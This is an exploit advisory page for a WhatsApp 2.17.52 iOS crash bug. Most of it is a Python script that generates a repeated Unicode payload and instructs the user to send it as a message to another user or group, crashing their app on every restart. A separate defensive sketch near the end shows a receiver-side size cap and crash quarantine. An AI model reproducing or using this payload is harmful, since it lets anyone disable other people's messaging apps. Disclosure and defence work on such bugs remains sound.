WhatsApp 2.17.52 Memory Corruption

2017.11.01
Credit: Juan Sacco
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Found this and more exploits on my open source security project: http://www.exploitpack.com
# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com
# Date and time of release: 11 October 2017
#
# Tested on: iPhone 5/6s iOS 10.3.3 and 11
#
# Description:
# WhatsApp 2.17.52 and prior is prone to a remote memory corruption.
# This type of attack is possible if the program uses memory inefficiently and does not impose limits on the amount of state used when necessary.
#
# Impact:
# Resource exhaustion attacks exploit a design deficiency. An attacker could exploit this vulnerability to remotely corrupt the memory of the application, forcing an unhandled exception
# in the context of the application that could potentially result in a denial-of-service condition and/or remote memory corruption.
#
# Warning note:
# Once a user receives the offending message it will automatically crash the application, and if it is restarted it will crash again until the message is manually removed from the user's history.
#
# Timeline:
# 09/13/2017 - Research started
# 09/13/2017 - First proof of concept
# 09/15/2017 - Reported to WhatsApp
# 09/20/2017 - Report triaged by Facebook
# 11/01/2017 - Facebook never replied back with a status fix
# 11/01/2017 - Disclosure as zero day
# Vendor homepage: http://www.whatsapp.com
import sys
reload(sys)

def whatsapp(filename):
    sys.setdefaultencoding("utf-8")
    payload = u'O" O(c) Oa O<< O! O O(r) O- Odeg O+- O2 O3 O' Ou OP O* O, O1 Oo U U U U U U' * 1337
    sutf8 = payload.encode('UTF-8')
    print "[*] Writing to file: " + filename
    open(filename, 'w').write(payload)
    print "[*] Done."

def howtouse():
    print "Usage: whatsapp.py [FILENAME]"
    print "[*] Mandatory arguments:"
    print "[-] FILENAME"
    sys.exit(-1)

if __name__ == "__main__":
    try:
        print "[*] WhatsApp 2.17.52 iOS - Remote memory corruption by Juan Sacco"
        print "[*] How to use: Copy the content of the file and send it as a message to another whatsapp user or group"
        whatsapp(sys.argv[1])
    except IndexError:
        howtouse()
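The advisory blames missing limits on per-message state and notes that the app crashes on every restart until the message is removed. The sketch below is an added example, not code from the advisory or from WhatsApp: a receiver-side guard that caps message size and records which message is being rendered, so that a message which killed the previous run is hidden on the next launch. The class name, the size cap, the state-file format and the `render` callback are all assumptions made for illustration.

```python
import contextlib, json, os, tempfile

MAX_CODE_POINTS = 4096  # assumed cap for this sketch, not a WhatsApp value

class GuardedRenderer:
    """Caps message size; quarantines a message that killed the previous run."""
    def __init__(self, state_path, render):
        self.state_path, self.render = state_path, render  # render: hypothetical callback
        self.state = {"pending": None, "quarantined": []}
        if os.path.exists(state_path):
            with open(state_path) as fh:
                self.state = json.load(fh)
        # A leftover "pending" id means the process died while rendering it.
        if self.state["pending"] is not None:
            self.state["quarantined"].append(self.state["pending"])
            self.state["pending"] = None
            self._save()

    def _save(self):
        tmp = self.state_path + ".tmp"
        with open(tmp, "w") as fh:
            json.dump(self.state, fh)
            fh.flush()
            os.fsync(fh.fileno())
        os.replace(tmp, self.state_path)  # atomic swap of the state file

    def show(self, msg_id, text):
        if msg_id in self.state["quarantined"]:
            return "[hidden: crashed the app on a previous launch]"
        if len(text) > MAX_CODE_POINTS:
            return "[hidden: message exceeds size limit]"
        self.state["pending"] = msg_id
        self._save()  # on disk before the risky call
        out = self.render(text)
        self.state["pending"] = None
        self._save()
        return out

def demo():
    def render(text):  # constructed renderer that dies on a marker string
        if "BAD" in text:
            raise SystemExit("simulated crash")
        return text.upper()
    path = os.path.join(tempfile.mkdtemp(), "render_state.json")
    with contextlib.suppress(SystemExit):  # stands in for the process dying
        GuardedRenderer(path, render).show("m1", "BAD glyph run")
    restarted = GuardedRenderer(path, render)
    return [restarted.show("m1", "BAD glyph run"),
            restarted.show("m2", "x" * (MAX_CODE_POINTS + 1)),
            restarted.show("m3", "hello")]
```

Because the quarantine list is persisted in the same state file, the offending message stays hidden across later launches instead of crashing every second one.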


Copyright 2017, cxsecurity.com

 
